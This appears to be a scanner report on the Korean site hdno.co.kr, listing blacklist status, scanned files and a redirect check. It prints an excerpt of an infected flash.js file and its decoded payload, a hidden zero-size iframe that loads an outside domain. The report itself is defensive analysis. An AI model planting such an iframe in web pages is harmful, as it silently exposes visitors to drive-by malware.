Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hdno.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hdno.co.kr/ | 200 OK Content-Length: 7782 Content-Type: text/html | clean |
http://www.hdno.co.kr/swf/flash.js | 200 OK Content-Length: 1479 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function swf(src,w,h) {
html = ''; html += '<object type="application/x-shockwave-flash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" id="param" width="'+w+'" height="'+h+'">'; html += '<param name="movie" value="'+src+'">'; html += '<param name="quality" value="high">'; html += '<param name="bgcolor" value="#ffffff">'; html += '<pa Decoded script: <iframe src=http://jejunamwon.com/index.html width=0 height=0></iframe> Antivirus reports:
| ||
http://www.hdno.co.kr/estimate/sitemap.asp | 200 OK Content-Length: 16815 Content-Type: text/html | clean |
http://www.hdno.co.kr/mypage/login.asp | 200 OK Content-Length: 10615 Content-Type: text/html | clean |
http://www.hdno.co.kr/common/js/common.js | 200 OK Content-Length: 27335 Content-Type: application/x-javascript | clean |
http://www.hdno.co.kr/mypage/history.asp | 200 OK Content-Length: 126 Content-Type: text/html | clean |
http://www.hdno.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/request.asp | 200 OK Content-Length: 10889 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../common/js/board.js | 200 OK Content-Length: 4789 Content-Type: application/x-javascript | clean |
http://www.hdno.co.kr/estimate/price1.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 05 Oct 2014 08:08:57 GMT Location: ../mypage/login.asp?danga=price1 Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html Set-Cookie: ASPSESSIONIDQAATBSCR=FJMBAJHALFPBIHMFGCOJPIBD; path=/ X-Powered-By: ASP.NET | clean |
http://www.hdno.co.kr/estimate/../mypage/login.asp?danga=price1 | 200 OK Content-Length: 10736 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../mypage/login.asp | 200 OK Content-Length: 10615 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/../mypage/history.asp | 200 OK Content-Length: 126 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/history.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/price2.asp | 200 OK Content-Length: 32523 Content-Type: text/html | clean |
http://www.hdno.co.kr/estimate/ | 403 Forbidden Content-Length: 223 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hdno.co.kr
Result:
GET / HTTP/1.1
Host: hdno.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hdno.co.kr
Referer: http://www.google.com/search?q=hdno.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hdno.co.kr
Referer: http://www.google.com/search?q=hdno.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.